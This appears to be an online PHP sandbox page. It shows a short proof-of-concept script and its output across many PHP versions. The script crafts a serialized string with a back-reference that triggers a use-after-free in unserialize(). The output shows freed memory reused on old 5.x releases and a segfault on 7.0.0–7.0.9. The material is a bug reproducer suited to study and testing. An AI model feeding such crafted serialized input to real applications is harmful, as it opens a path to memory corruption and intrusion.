@ 2015-11-03T20:14:23Z <?php
class obj implements Serializable
{
private $data;
public function serialize()
{
return serialize($this->data);
}
public function unserialize($data)
{
$this->data = unserialize($data);
$this->data = 1;
}
}
$inner = 'a:0:{}';
$exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = 'hi' . $i;
}
var_dump($data);
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Output for 8.1.0 - 8.1.28 , 8.2.0 - 8.2.18 , 8.3.0 - 8.3.6 Deprecated: obj implements the Serializable interface, which is deprecated. Implement __serialize() and __unserialize() instead (or in addition, if support for old PHP versions is necessary) in /in/IFTDh on line 3
array(2) {
[0]=>
object(obj)#1 (1) {
["data":"obj":private]=>
int(1)
}
[1]=>
array(0) {
}
}
Output for 5.5.29 - 5.5.37 , 5.6.13 - 5.6.23 , 7.0.20 , 7.1.0 - 7.1.20 , 7.2.0 - 7.2.33 , 7.3.16 - 7.3.33 , 7.4.0 - 7.4.33 , 8.0.0 - 8.0.30 array(2) {
[0]=>
object(obj)#1 (1) {
["data":"obj":private]=>
int(1)
}
[1]=>
array(0) {
}
}
Output for 7.0.0 - 7.0.9 array(2) {
[0]=>
Process exited with code 139 . Output for 5.5.0 - 5.5.28 , 5.6.0 - 5.6.12 array(2) {
[0]=>
object(obj)#1 (1) {
["data":"obj":private]=>
int(1)
}
[1]=>
string(3) "hi1"
}
preferences:dark mode live preview
177.56 ms | 402 KiB | 220 Q